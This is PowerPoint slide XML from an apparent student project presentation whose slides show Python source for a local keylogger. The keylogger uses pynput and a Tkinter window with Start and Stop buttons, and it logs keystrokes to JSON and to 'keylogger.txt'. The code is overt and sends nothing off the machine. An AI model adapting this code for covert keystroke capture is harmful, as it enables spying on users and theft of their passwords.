              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(str(keys))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12795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E2A3-77C7-CCFC-CAB4-6DAF56BBF1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1066800"/>
            <a:ext cx="10681335" cy="4431983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625086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245</TotalTime>
  <Words>726</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>74</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Inter</vt:lpstr>
      <vt:lpstr>Sitka Small Semibold</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>M LEELA SAI</vt:lpstr>
      <vt:lpstr>PROJECT TITLE</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PROJECT OVERVIEW</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr>YOUR SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>def on_release(key):     global flag, keys_used, keys     keys_used.append(         {'Released': f'{key}'}     )      if flag == True:         flag = False     generate_json_file(keys_used)      keys = keys + str(key)     generate_text_log(str(keys))  def start_keylogger():     global listener     listener = keyboard.Listener(on_press=on_press, on_release=on_release)     listener.start()</vt:lpstr>
      <vt:lpstr>label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")     start_button.config(state='disabled')     stop_button.config(state='normal')  def stop_keylogger():     global listener     listener.stop()     label.config(text="Keylogger stopped.")     start_button.config(state='normal')     stop_button.config(state='disabled')  root = Tk() root.title("Keylogger") label = Label(root, text='Click "Start" to begin keylogging.') label.config(anchor=CENTER) label.pack()</vt:lpstr>
      <vt:lpstr>start_button = Button(root, text="Start", command=start_keylogger) start_button.pack(side=LEFT)  stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled') stop_button.pack(side=RIGHT)  root.geometry("250x250")  root.mainloop() </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 Leelasai</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-24T10:18:29Z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